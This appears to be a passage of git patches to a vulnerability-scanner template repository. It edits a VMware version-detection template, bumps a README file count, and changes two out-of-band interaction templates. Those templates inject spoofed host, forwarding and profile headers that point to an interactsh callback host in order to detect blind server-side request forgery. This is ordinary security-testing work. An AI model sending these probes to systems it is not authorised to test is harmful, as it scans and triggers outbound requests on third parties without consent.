a/technologies/vmware-version-detect.yaml b/technologies/vmware-version-detect.yaml index eccf5ef799..2321779424 100644 --- a/technologies/vmware-version-detect.yaml +++ b/technologies/vmware-version-detect.yaml @@ -9,6 +9,7 @@ info: - https://www.pwndefend.com/2021/09/23/exposed-vmware-vcenter-servers-around-the-world-cve-2021-22005/ - https://svn.nmap.org/nmap/scripts/vmware-version.nse tags: tech,vcenter,vmware + requests: - raw: - | @@ -43,68 +44,15 @@ requests: words: - ha-folder-root + - type: word + words: + - "text/xml" + part: header + extractors: - type: regex - name: name part: body group: 1 regex: - "<name>(.*?)</name>" - - - type: regex - name: version - part: body - group: 1 - regex: - "<version>(.*?)</version>" - - - type: regex - name: build - part: body - group: 1 - regex: - - "<build>(.*?)</build>" - - - type: regex - name: localeVersion - part: body - group: 1 - regex: - - "<localeVersion>(.*?)</localeVersion>" - - - - type: regex - name: localeBuild - part: body - group: 1 - regex: - - "<localeBuild>(.*?)</localeBuild>" - - - - type: regex - name: osType - part: body - group: 1 - regex: - - "<osType>(.*?)</osType>" - - - type: regex - name: productLineId - part: body - group: 1 - regex: - - "<productLineId>(.*?)</productLineId>" - - - type: regex - name: apiType - part: body - group: 1 - regex: - - "<apiType>(.*?)</apiType>" - - - type: regex - name: apiVersion - part: body - group: 1 - regex: - - "<apiVersion>(.*?)</apiVersion>" From 3cf123a9d76cc9e51fe6bbc481d01cab68cc4554 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 29 Sep 2021 21:50:24 +0000 Subject: [PATCH 65/67] Auto README Update [Wed Sep 29 21:50:24 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0b53bebb69..03e2db8dcf 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | cve2020 | 164 | madrobot | 61 | file | 46 | | | | | | wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | | -**166 directories, 2144 files**. +**166 directories, 2155 files**. </td> </tr> From be297d732b4b7f8efdade64ec7a75fe671159636 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 30 Sep 2021 03:26:16 +0530 Subject: [PATCH 66/67] misc update --- .../generic/oob-header-based-interaction.yaml | 15 +++++++++++---- .../generic/request-based-interaction.yaml | 7 +++++++ 2 files changed, 18 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/generic/oob-header-based-interaction.yaml b/vulnerabilities/generic/oob-header-based-interaction.yaml index 399af47472..b4404a4f0c 100644 --- a/vulnerabilities/generic/oob-header-based-interaction.yaml +++ b/vulnerabilities/generic/oob-header-based-interaction.yaml @@ -26,15 +26,22 @@ requests: X-Wap-Profile: http://{{interactsh-url}}/wap.xml X-Forwarded-For: spoofed.{{interactsh-url}} Contact: root@{{interactsh-url}} - X-Forwarded-Host: 'spoofed.{{interactsh-url}}' - X-Host: 'spoofed.{{interactsh-url}}' - X-Forwarded-Server: 'spoofed.{{interactsh-url}}' - X-HTTP-Host-Override: 'spoofed.{{interactsh-url}}' + X-Forwarded-Host: spoofed.{{interactsh-url}} + X-Host: spoofed.{{interactsh-url}} + X-Forwarded-Server: spoofed.{{interactsh-url}} + X-HTTP-Host-Override: spoofed.{{interactsh-url}} Cache-Control: no-transform + matchers-condition: or matchers: - type: word part: interactsh_protocol name: http words: - "http" + + - type: word + part: interactsh_protocol + name: dns + words: + - "dns" diff --git a/vulnerabilities/generic/request-based-interaction.yaml b/vulnerabilities/generic/request-based-interaction.yaml index e968c99cd6..9e7fe9e40a 100644 --- a/vulnerabilities/generic/request-based-interaction.yaml +++ b/vulnerabilities/generic/request-based-interaction.yaml @@ -41,9 +41,16 @@ requests: Accept: */* unsafe: true # Use Unsafe HTTP library for malformed HTTP requests. + matchers-condition: or matchers: - type: word part: interactsh_protocol name: http words: - "http" + + - type: word + part: interactsh_protocol + name: http + words: + - "http" From 553a7a2480211ac1e28fbe53ca89a699bf9f1857 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 30 Sep 2021 03:31:03 +0530 Subject: [PATCH 67/67] Update request-based-interaction.yaml --- vulnerabilities/generic/request-based-interaction.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/generic/request-based-interaction.yaml b/vulnerabilities/generic/request-based-interaction.yaml index 9e7fe9e40a..e532b15dde 100644 --- a/vulnerabilities/generic/request-based-interaction.yaml +++ b/vulnerabilities/generic/request-based-interaction.yaml @@ -51,6 +51,6 @@ requests: - type: word part: interactsh_protocol - name: http + name: dns words: - - "http" + - "dns"